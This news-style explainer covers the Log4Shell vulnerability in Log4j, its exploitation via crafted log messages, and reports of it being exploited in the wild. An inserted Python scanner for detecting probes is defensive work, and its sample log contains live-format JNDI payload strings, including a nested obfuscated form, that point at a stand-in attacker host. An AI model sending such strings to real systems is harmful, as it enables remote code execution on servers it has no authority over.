Log4Shell is a new zero-day vulnerability discovered last Thursday, when it was exploited to remotely compromise Minecraft servers. The vulnerability is tracked as CVE-2021-44228 and was assigned a severity score of 10 out of 10 because it is very easy to exploit and allows unauthenticated remote code execution.
The vulnerability affects Log4j, an open source Java logging library from Apache that is used by hundreds of thousands of applications, especially in the cloud, including software in use at almost every company on the planet.
Event logging is the process by which applications keep a running record of the activities they perform, so that it can be analysed later when errors occur. Almost all network security systems run some kind of event log, which gives libraries such as Log4j nearly endless reach.
The vulnerability is exploited by getting a specially crafted sequence of characters written to the log, as Cloudflare illustrated in detail in its analysis. And, as mentioned, it can be exploited with ease: in the case of Minecraft, for example, the sequence could be written to the log simply by sending a message in the in-game chat.
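As an added illustration (not from the article or from Cloudflare's analysis), a small Python log scanner that flags the lookup string Log4Shell relies on, including the nested case-mangling form, so that a defender can sweep existing logs for probes; the sample log lines, host names and addresses are constructed.

```python
import re
# Constructed sample log (not from the article); lines 3-5 carry the lookup
# string Log4Shell abuses, line 4 in a nested case-mangled form; line 6 is benign.
SAMPLE_LOG = """\
2021-12-10T12:00:01Z INFO  Player alice joined the game
2021-12-10T12:00:05Z INFO  <bob> hello everyone
2021-12-10T12:00:09Z INFO  <mallory> ${jndi:ldap://attacker.example/a}
2021-12-10T12:00:12Z INFO  <mallory> ${${lower:j}ndi:ldap://attacker.example/b}
2021-12-10T12:00:15Z WARN  User-Agent: ${JNDI:rmi://203.0.113.5/x}
2021-12-10T12:00:20Z INFO  <carol> my home dir is ${env:HOME}
"""

INNER_RE = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...}: no "${" inside
NESTED_RE = re.compile(r"\$\{[^{}]*\$\{")    # a lookup with another nested in it

def _resolve(m) -> str:
    """Evaluate one innermost lookup the way Log4j 2's substitutor would."""
    body = m.group(1)
    head, sep, rest = body.partition(":")
    key = head.lower()
    if key == "jndi":
        return m.group(0)              # keep it: this is what we are hunting
    if key == "lower" and sep:
        return rest.lower()
    if key == "upper" and sep:
        return rest.upper()
    if ":-" in body:                   # ${name:-default} resolves to default
        return body.split(":-", 1)[1]
    return m.group(0)                  # unknown lookup: leave as is

def normalize(line: str, max_rounds: int = 20) -> str:
    # Collapse nested lookups inside out until nothing changes.
    for _ in range(max_rounds):
        new_line = INNER_RE.sub(_resolve, line)
        if new_line == line:
            break
        line = new_line
    return line

def classify(line: str):
    """'jndi-lookup', 'nested-lookup' (unresolved, review by hand) or None."""
    norm = normalize(line)
    if any(m.group(1).lower().startswith("jndi:") for m in INNER_RE.finditer(norm)):
        return "jndi-lookup"
    if NESTED_RE.search(norm):
        return "nested-lookup"
    return None

def scan(log_text: str):
    # (line number, verdict) for every suspicious line in the log
    return [(n, v) for n, line in enumerate(log_text.splitlines(), 1)
            if (v := classify(line))]
```

Lines that normalise to a `jndi:` lookup are the clear hits; lines that still contain an unresolved nested lookup are worth a manual look, since the scanner only evaluates the lookup types it knows.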
Since the Minecraft servers were compromised, the security company GreyNoise has detected active scanning across the Internet looking for vulnerable servers. The researchers note that they have observed the vulnerability being exploited for various purposes: from installing malware to cryptomining, to strengthening Linux botnets, as well as the extraction of data and configuration files.